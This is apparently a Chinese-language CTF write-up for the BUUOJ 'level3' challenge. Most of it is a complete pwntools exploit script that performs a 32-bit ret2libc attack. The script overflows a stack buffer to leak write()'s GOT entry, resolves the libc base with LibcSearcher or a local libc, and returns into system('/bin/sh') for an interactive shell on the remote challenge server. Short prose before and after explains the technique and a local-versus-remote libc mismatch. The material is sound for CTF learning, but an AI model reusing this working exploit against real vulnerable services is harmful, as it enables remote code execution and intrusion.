
栈不可执行（NX 开启），32 位程序，所以不能往栈上写 shellcode 直接跳过去执行，要走 ret2libc。
这个漏洞太熟了，标准 ret2libc3：第一次溢出 ret 到 write@plt，把 write 的 GOT 表项打印出来泄露 write 在 libc 里的真实地址，再返回 main；算出 libc 基址后第二次溢出 ret 到 system("/bin/sh")。
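"""level3 (BUUOJ) -- 32-bit ret2libc3 exploit.

Stage 1 overflows the stack buffer and returns into write@plt with the
arguments (1, write@got, 4), then returns into main.  That prints the
runtime address of write() and gives us a second overflow.  Stage 2 turns
the leak into the libc base and returns into system("/bin/sh").

The binary has NX, so no shellcode is placed on the stack.  Offsets come
from LibcSearcher against the remote service, or from a local libc.so.6
when LOCAL_LIBC is set (the remote libc and a local one differ, which is
why the LibcSearcher variant only works against the server).
"""
from pwn import *
from LibcSearcher import LibcSearcher

# "debug" echoes every byte sent and received -- handy for a CTF, noisy otherwise.
context(log_level="debug")

HOST, PORT = "node4.buuoj.cn", 28740
BINARY = "level3"

# Set to the path of the libc your local process loads (e.g.
# "/lib/i386-linux-gnu/libc.so.6") to attack a local process and resolve
# offsets from that file.  None means: attack the remote service and let
# LibcSearcher guess the libc from the leaked address.
LOCAL_LIBC = None

# Bytes from the start of the overflowed buffer up to the saved EBP;
# four more bytes reach the saved return address.
OFFSET = 0x88
PROMPT = b"Input:\n"


def connect():
    """Return a pwntools tube: a local process when LOCAL_LIBC is set, else the remote service."""
    if LOCAL_LIBC is not None:
        return process("./" + BINARY)
    return remote(HOST, PORT)


def leak_write(io, elf):
    """Leak write()'s runtime address and return it as an int.

    The first payload makes the function return into write@plt, with main
    as write()'s own return address and (fd=1, buf=&write@got, len=4) as
    its arguments, so the GOT entry is written to stdout and main runs
    again for a second overflow.
    """
    payload = (
        b"a" * (OFFSET + 4)        # buffer + saved EBP
        + p32(elf.plt["write"])    # saved return address -> write@plt
        + p32(elf.sym["main"])     # write() returns here: back into main
        + p32(1)                   # fd
        + p32(elf.got["write"])    # buf: address of write's GOT slot
        + p32(4)                   # len: one 32-bit pointer
    )
    io.recvuntil(PROMPT)
    io.sendline(payload)
    # recvn blocks until exactly 4 bytes have arrived; recv(4) may return a
    # short read, and u32 would then fail on anything but 4 bytes.
    write_addr = u32(io.recvn(4))
    log.success("write_addr ==> " + hex(write_addr))
    return write_addr


def resolve_libc(write_addr):
    """Return (system_addr, bin_sh_addr) computed from the leaked write() address.

    With LOCAL_LIBC set the offsets are read straight from that ELF;
    otherwise LibcSearcher looks the leak up in its database, which may
    offer several candidate libcs and prompt for a choice.
    """
    if LOCAL_LIBC is not None:
        libc = ELF(LOCAL_LIBC)
        base = write_addr - libc.sym["write"]
        return base + libc.sym["system"], base + next(libc.search(b"/bin/sh"))

    # NOTE(review): the author reports this path works against the server but
    # not locally -- presumably because the libc LibcSearcher picks is the
    # remote one, not the one a local process loads.  Use LOCAL_LIBC locally.
    libc = LibcSearcher("write", write_addr)
    base = write_addr - libc.dump("write")
    return base + libc.dump("system"), base + libc.dump("str_bin_sh")


def get_shell(io, system_addr, bin_sh_addr):
    """Second overflow: return into system("/bin/sh") and hand the tube to the user."""
    payload = (
        b"a" * (OFFSET + 4)
        + p32(system_addr)
        + b"aaaa"                  # fake return address for system(); never used
        + p32(bin_sh_addr)         # system()'s single argument
    )
    io.recvuntil(PROMPT)
    io.sendline(payload)
    io.interactive()


def main():
    """Run the two-stage exploit end to end."""
    elf = ELF(BINARY)
    io = connect()
    write_addr = leak_write(io, elf)
    system_addr, bin_sh_addr = resolve_libc(write_addr)
    get_shell(io, system_addr, bin_sh_addr)


if __name__ == "__main__":
    main()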
不过我本地每次都打不通，打远程服务器就能打通，应该是 libc 的问题：LibcSearcher 是拿泄露出来的地址去它的库里匹配 libc 版本，匹配到的是远程题目环境的 libc，而本地进程加载的 libc 版本不同，system 和 /bin/sh 的偏移自然对不上。本地调试时应该直接用本机的 libc（例如 ELF('/lib/i386-linux-gnu/libc.so.6')）来算偏移，而不是用 LibcSearcher。
